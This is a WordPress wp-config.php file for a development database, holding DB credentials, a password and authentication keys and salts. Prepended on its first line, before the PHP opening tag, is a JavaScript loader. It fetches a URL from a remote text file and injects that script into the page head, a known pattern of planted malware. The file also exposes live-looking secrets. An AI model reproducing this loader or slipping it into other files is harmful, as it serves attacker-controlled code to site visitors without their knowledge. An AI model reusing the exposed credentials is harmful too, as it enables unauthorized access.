;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
//define('FORCE_SSL_ADMIN', true);
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'cc_sales_dev' );
/** MySQL database username */
define( 'DB_USER', 'cc_sales_dev_user' );
/** MySQL database password */
define( 'DB_PASSWORD', 'z6DWaLUrWf9q' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/** Plugin download localhost */
define('FS_METHOD', 'direct');
/**Cron */
// define('DISABLE_WP_CRON', true);
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '!$8 &i7.``@1,]w!n/%&*1x(y)EtQ~=Jh2F3A_x*0*HF,KL*VN82Srwv7p(0x3EV' );
define( 'SECURE_AUTH_KEY', 'QotaX?HDbK#~BM){-5DOs|^*8$Zn8zRGp78tn_{ik1qnrHcbb[kI_*Dn,dYB8 84' );
define( 'LOGGED_IN_KEY', '5M=(BXD.-l^K.? )}31wi8T@yy$@sf50,g:O5H4QCMz[zX046Hl18iNo0X0Vv~ko' );
define( 'NONCE_KEY', 't,4][4H@W7h?!1rr=m0TE.5L.&Yv~I})|wL7wHNgZ()dYi^H%+JtZ=ilo/5M%iKW' );
define( 'AUTH_SALT', '_d~b?6>FVP_H]/JC59gQzl/>~,%p.C>NGAK+%/2RmPzP3i,<lkre>}#t2k1);e5m' );
define( 'SECURE_AUTH_SALT', 'KOfhX 7vbnr@6GZN2:WPa P6qICK6#*{H><gW2]vCx<&r[1d_>q&)ISJ.YcN87__' );
define( 'LOGGED_IN_SALT', '7K73~#,*zGQ`gXrH1+C4-_.3!{ZzNV06AoGwfcA=<dfT&}YBkkL{ZjQ#}y2ro_1h' );
define( 'NONCE_SALT', '9r&)q]GTd}[xd5OnFXK=v-j:C~O6GzB+hvfaZ=rypA~`H`AB*@9dJvZ,m$MgKZ8<' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}
/*if ( ! defined( 'VENDOR_AUTOLOAD' ) ) {
define( 'VENDOR_AUTOLOAD', dirname( _FILE_ ) . '/vendor/autoload.php' );
}
if ( ! defined( 'CONSTANTS' ) ) {
define( 'CONSTANTS', dirname( _FILE_ ) . '/constants/SampleCodeConstants.php' );
}*/
if ( ! defined( 'VENDOR_AUTOLOAD' ) ) {
define( 'VENDOR_AUTOLOAD', dirname( __FILE__ ) . '/vendor/autoload.php' );
}
if ( ! defined( 'CONSTANTS' ) ) {
define( 'CONSTANTS', dirname( __FILE__ ) . '/constants/SampleCodeConstants.php' );
}
/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );